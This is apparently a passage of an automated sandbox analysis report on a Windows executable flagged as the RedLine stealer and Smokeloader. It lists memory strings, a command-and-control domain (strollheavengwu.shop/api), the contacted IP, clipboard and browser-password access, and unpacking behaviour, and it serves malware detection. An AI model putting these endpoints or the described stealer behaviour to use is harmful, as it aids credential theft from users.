            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1687686767.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1679141291.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1658730673.000000000682F000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1659021463.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1679306292.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1677973683.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1679474150.0000000006830000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/7
            Source: o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/9
            Source: o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/D
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1689473916.0000000004335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/api
            Source: o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apiIF3
            Source: o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apiN
            Source: o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apib2
            Source: o7b91j8vnJ.exe, 00000000.00000003.1721593582.000000000434A000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000002.1845373777.000000000434C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apie
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apih02
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649788363.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1649671760.00000000042CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apime
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apior
            Source: o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apis
            Source: o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/d
            Source: o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/e
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668259812.0000000004326000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1667240697.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/v
            Source: o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/y
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_0042C500 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042C500
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_0042C500 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042C500

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004320100_2_00432010
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004204B70_2_004204B7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004047400_2_00404740
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_00420CA00_2_00420CA0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004060300_2_00406030
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004032600_2_00403260
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004052F00_2_004052F0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004065F00_2_004065F0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004345F00_2_004345F0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_0040F6900_2_0040F690
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004397D00_2_004397D0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_0042594F0_2_0042594F
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_004259D20_2_004259D2
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_00431A700_2_00431A70
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_0041CAEC0_2_0041CAEC
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_00439AF00_2_00439AF0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_00407CB00_2_00407CB0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_00403D700_2_00403D70
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_00402E700_2_00402E70
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D34C70_2_041D34C7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D55DB0_2_041D55DB
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D30D70_2_041D30D7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D12670_2_041D1267
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D62970_2_041D6297
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041F5C390_2_041F5C39
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_04201CD70_2_04201CD7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_04209D570_2_04209D57
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D7F170_2_041D7F17
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041F0F070_2_041F0F07
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D3FD70_2_041D3FD7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041DF8240_2_041DF824
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_042048570_2_04204857
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041DF8F70_2_041DF8F7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D49A70_2_041D49A7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_04209A370_2_04209A37
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041F5BB60_2_041F5BB6
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: String function: 041D8F97 appears 168 times
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: String function: 00408D30 appears 168 times
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: String function: 041D8967 appears 48 times
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: String function: 00408700 appears 47 times
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 1516
            Source: o7b91j8vnJ.exe, 00000000.00000000.1631441452.0000000004038000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirez( vs o7b91j8vnJ.exe
            Source: o7b91j8vnJ.exe, 00000000.00000003.1632124053.00000000042BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFirez( vs o7b91j8vnJ.exe
            Source: o7b91j8vnJ.exeBinary or memory string: OriginalFilenameFirez( vs o7b91j8vnJ.exe
            Source: o7b91j8vnJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_04265BD6 CreateToolhelp32Snapshot,Module32First,0_2_04265BD6
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_00429597 CoCreateInstance,0_2_00429597
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6856
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\289d5835-1b8d-43c2-b257-a4bf03cf1062Jump to behavior
            Source: o7b91j8vnJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650471952.000000000683C000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1650226468.0000000006858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: o7b91j8vnJ.exeVirustotal: Detection: 42%
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile read: C:\Users\user\Desktop\o7b91j8vnJ.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\o7b91j8vnJ.exe "C:\Users\user\Desktop\o7b91j8vnJ.exe"
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 1516
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: o7b91j8vnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: o7b91j8vnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: o7b91j8vnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: o7b91j8vnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: o7b91j8vnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: o7b91j8vnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: o7b91j8vnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\makeba20\noxadikayovic.pdb source: o7b91j8vnJ.exe
            Source: o7b91j8vnJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: o7b91j8vnJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: o7b91j8vnJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: o7b91j8vnJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: o7b91j8vnJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeUnpacked PE file: 0.2.o7b91j8vnJ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeUnpacked PE file: 0.2.o7b91j8vnJ.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_0043FBE7 push ecx; iretd 0_2_0043FBE8
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
